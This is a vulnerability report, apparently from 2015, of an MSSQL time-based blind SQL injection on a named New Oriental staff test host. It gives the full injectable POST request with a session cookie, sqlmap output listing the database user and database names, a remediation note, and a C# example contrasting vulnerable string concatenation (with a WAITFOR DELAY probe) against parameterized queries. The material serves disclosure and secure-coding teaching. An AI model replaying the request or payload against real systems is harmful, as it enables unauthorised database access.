MSSQL blind injection on a New Oriental (新东方) site
Posted on: 2015-7-8 08:45
Injection point:
POST /p/Handler/ApiHandler.ashx HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://xytest.staff.xdf.cn
Cookie: ASP.NET_SessionId=hkjmbgvondvsrk55zj1jxc45
Host: xytest.staff.xdf.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
OpType=IsValidate&studenType=3&studenVal=123456*%20--%20
The studenVal parameter is injectable (the `*` in the request body is sqlmap's injection-point marker, and `%20--%20` comments out the rest of the statement). Confirmed as an MSSQL time-based blind injection; sqlmap output follows.
current user: 'shanqibin'
current database: 'NISmember0311'
back-end DBMS: Microsoft SQL Server 2008
[11:36:03] [INFO] fetching database names
[11:36:03] [INFO] fetching number of databases
[11:36:03] [INFO] resumed: 59
[11:36:03] [INFO] resumed: A2
[11:36:03] [INFO] resumed: aaa
[11:36:03] [INFO] resumed: AD_PASSPORT_DB
[11:36:03] [INFO] resumed: API
[11:36:03] [INFO] resumed: aspnetdb
[11:36:03] [INFO] resumed: BJ20140519
[11:36:03] [INFO] resumed: BJ20140520
[11:36:03] [INFO] resumed: BJ20140606
[11:36:03] [INFO] resumed: BJ201406061400
[11:36:03] [INFO] resumed: BJ20140714
[11:36:03] [INFO] resumed: BJ20140714_001
[11:36:03] [INFO] resumed: BJ20140915
[11:36:03] [INFO] resumed: bjnis_crm
[11:36:03] [INFO] resumed: BJTEST
[11:36:03] [INFO] resumed: BJTEST_DY
[11:36:03] [INFO] resumed: bushutest
[11:36:03] [INFO] resumed: CQ0825
[11:36:03] [INFO] resumed: CQNIS0519
[11:36:03] [INFO] resumed: CS0818
[11:36:03] [INFO] resumed: DevRequire
There are 59 databases in total; only part of the list was enumerated above.
Remediation:
Filter and validate the studenVal parameter (and pass it to the database as a bound parameter rather than concatenating it into the SQL statement).
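As an added example (not code from the original report, and not New Oriental's actual handler), the C# below shows how an ASP.NET `.ashx` handler of the kind behind `/p/Handler/ApiHandler.ashx` typically acquires this bug, and what the parameterized fix looks like. The table `Students`, its columns, the connection-string name `NIS`, the allowed range for `studenType`, and the `WAITFOR DELAY` probe used for contrast are all assumptions chosen for illustration; the report itself does not disclose the query or the payload sqlmap used.

```csharp
// Added example, not the original page's code. Hypothetical ASHX handler
// showing the vulnerable concatenation pattern next to the parameterized fix.
// Assumed (not from the report): table Students(Id nvarchar, StudentType int),
// a connection string named "NIS" in web.config, studenType valid range 1..3.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public class ApiHandler : IHttpHandler
{
    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext context)
    {
        string opType = context.Request.Form["OpType"];
        string studenType = context.Request.Form["studenType"];
        string studenVal = context.Request.Form["studenVal"];

        if (opType != "IsValidate")
        {
            context.Response.StatusCode = 400;
            return;
        }

        bool ok = IsValidateSafe(studenType, studenVal);
        context.Response.ContentType = "text/plain";
        context.Response.Write(ok ? "1" : "0");
    }

    // VULNERABLE pattern (kept only for contrast): the attacker-controlled value
    // is spliced into the statement text. A generic MSSQL time-based probe such as
    //   123456'; WAITFOR DELAY '0:0:5'--
    // then executes as SQL, and response latency leaks one bit per request even
    // though the handler only ever returns "1" or "0".
    static bool IsValidateVulnerable(string studenType, string studenVal)
    {
        string sql = "SELECT COUNT(*) FROM Students WHERE StudentType = " + studenType +
                     " AND Id = '" + studenVal + "'";
        using (var cn = new SqlConnection(ConfigurationManager.ConnectionStrings["NIS"].ConnectionString))
        using (var cmd = new SqlCommand(sql, cn))
        {
            cn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // FIXED: allow-list the numeric type, length-check the value, and bind both
    // as SqlParameters. Parameters travel separately from the statement text, so
    // no value can change the query's structure.
    static bool IsValidateSafe(string studenType, string studenVal)
    {
        int type;
        if (!int.TryParse(studenType, out type) || type < 1 || type > 3) // assumed range
            return false;
        if (string.IsNullOrEmpty(studenVal) || studenVal.Length > 32)
            return false;

        const string sql = "SELECT COUNT(*) FROM Students WHERE StudentType = @type AND Id = @val";
        using (var cn = new SqlConnection(ConfigurationManager.ConnectionStrings["NIS"].ConnectionString))
        using (var cmd = new SqlCommand(sql, cn))
        {
            cmd.Parameters.Add("@type", SqlDbType.Int).Value = type;
            cmd.Parameters.Add("@val", SqlDbType.NVarChar, 32).Value = studenVal;
            cmd.CommandTimeout = 5; // a short timeout also blunts any residual time-based probing
            cn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

The allow-list on `studenType` matters as much as the bound parameter on `studenVal`: the request shows it as a bare integer, and an integer-looking field concatenated into SQL is injectable just like a quoted string, only without needing a closing quote. Binding both parameters and rejecting anything outside the expected shape is the fix the report's "parameter filtering" recommendation amounts to in practice.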